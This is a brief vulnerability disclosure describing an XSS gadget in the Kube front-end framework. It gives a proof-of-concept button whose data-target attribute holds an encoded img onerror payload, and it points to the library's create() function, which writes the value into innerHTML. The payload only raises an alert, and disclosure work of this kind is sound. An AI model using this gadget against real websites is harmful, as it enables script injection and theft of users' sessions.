XSS Gadget in kubeframework

[Tyaoo]

The injection point of the XSS Gadget is attribute data-target.

<button data-target="&lt;img src onerror=alert(1)&gt;" data-kube="alert">xss</button>
<script src="kube/dist/js/kube.js"></script>
<script>
    $K.init();
</script>

And the related code is below:

    create: function(html)
    {
        if (/^<(\w+)\s*\/?>(?:<\/\1>|)$/.test(html))
        {
            return [document.createElement(RegExp.$1)];
        }

        var elements = [];
        var container = document.createElement('div');
        var children = container.childNodes;

        container.innerHTML = html; // Here is the sink

        for (var i = 0, l = children.length; i < l; i++)
        {
            elements.push(children[i]);
        }

        return elements;
    }